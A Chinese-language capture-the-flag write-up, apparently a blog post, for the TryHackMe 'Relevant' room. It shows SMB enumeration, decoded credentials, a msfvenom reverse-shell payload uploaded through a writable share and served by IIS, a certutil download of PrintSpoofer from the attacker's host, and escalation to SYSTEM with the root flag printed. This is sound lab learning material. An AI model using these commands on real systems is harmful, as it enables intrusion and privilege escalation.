TryHackMe-进攻性渗透测试-08_Relevant

Relevant

您已被分配到需要渗透测试的客户 在 7 天内发布到生产环境中进行。

工作范围

客户端请求 工程师进行评估 提供的虚拟环境。客户要求最小 提供有关评估的信息,希望参与 从恶意行为者的眼睛进行(黑匣子渗透 测试)。客户端要求您保护两个标志(无位置) 提供)作为剥削的证据:

user.txt
root.txt
此外,客户还提供了以下范围津贴:

此服务中允许使用任何工具或技术,但我们要求您先尝试手动利用
找到并记下发现的所有漏洞
将发现的标志提交到仪表板
只有分配给计算机的 IP 地址在范围内
查找并报告所有漏洞(是的,根路径不止一条)


循例 nmap 扫,80的web访问不了,检索smb看看

┌──(root💀kali)-[/home/sugobet]
└─# smbclient -L 10.10.162.209  
┌──(root💀kali)-[/home/sugobet]
└─# smbclient //10.10.162.209/nt4wrksv 
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jul 26 05:46:04 2020
  ..                                  D        0  Sun Jul 26 05:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 23:15:33 2020

疑似密码,get下来后打开

是base64,解码后:

Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$

到这里线索断了,因为也没有开ssh,也没有web,我重新运行nmap,但这次我扫了全部端口,果然还有隐藏端口:

49663/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown

使用nc、curl逐个连接看看:

┌──(root💀kali)-[/home/sugobet]
└─# curl http://10.10.162.209:49663

这个端口获得了响应

gobuster扫一波

/aspnet_client

此外就没别的了,正当我想随便输入个错误路径时,发现没有任何错误页面和回显

随便搞了搞,会想起刚刚的smb目录,我想反正也没啥了,干脆试试,没想到又撞对了:

http://10.10.162.209:49663/nt4wrksv/passwords.txt

居然访问到了smb的目录的文件

我们试试有没有权限写入文件

smb: \> put ./passwords.txt psssss.txt
putting file ./passwords.txt as \psssss.txt (0.1 kb/s) (average 0.1 kb/s)
smb: \> ls
  .                                   D        0  Sun Dec 18 23:07:56 2022
  ..                                  D        0  Sun Dec 18 23:07:56 2022
  passwords.txt                       A       98  Sat Jul 25 23:15:33 2020
  psssss.txt                          A       98  Sun Dec 18 23:07:56 2022

		7735807 blocks of size 4096. 5136276 blocks available

很好,那么根据一般思路,应该就是要上传个reverse shell然后在web上访问getshell

┌──(root💀kali)-[/home/sugobet]
└─# msfvenom -p windows/x64/shell_reverse_tcp lhost=10.11.17.14 lport=8888 -f asp > she11.asp 
smb: \> put ./she11.asp

开启nc监听,访问web

getshell翻车了,没事,按照已经做过的题的思路,我们换个shell后缀再尝试一下,asp不行尝试aspx

尝试这两个是因为上面gobuster扫描到的那个目录,加上是iis

http://10.10.162.209:49663/nt4wrksv/she11.aspx

成功getshell


查询systeminfo和whoami /priv

SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 

SeImpersonatePrivilege,这里可以尝试模拟令牌

通过PrintSpoofer帮助我们利用

┌──(root💀kali)-[/home/sugobet]
└─# python3 -m http.server 8000
目标上:certutil.exe -urlcache -split -f http://10.11.17.14:8000/PrintSpoofer64.exe
C:\Windows\Temp>PrintSpoofer64.exe -i -c cmd
PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

成功提权root

C:\Users\Administrator\Desktop>type root.txt
type root.txt
THM{1fk5kf469devly1gl320zafgl345pv}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值